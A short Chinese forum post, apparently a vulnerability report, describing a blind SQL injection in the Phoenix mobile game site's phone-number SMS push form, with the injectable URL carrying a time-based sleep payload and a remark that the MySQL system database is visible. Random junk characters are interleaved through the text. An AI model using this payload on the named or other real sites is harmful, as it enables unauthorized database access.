简要描述:/ c$ o* R) w+ M D8 e& `8 ~2 S5 H
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
# |5 G2 X1 i& n6 e l V- i8 u9 l( p3 |
详细说明:6 c, A( n4 J8 w0 B0 B
存在SQL盲注url:
~* n3 Q4 e" Vfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
% m, m2 L; K' o: Uhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png, O: V- L( H; K0 i8 e# c" a
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png' i! r6 p- F4 J
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg2 Z* R( s- ]- R% l! l1 i
1 K# g; L5 {1 N* ?3 t2 d! H/ W6 ~ E能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对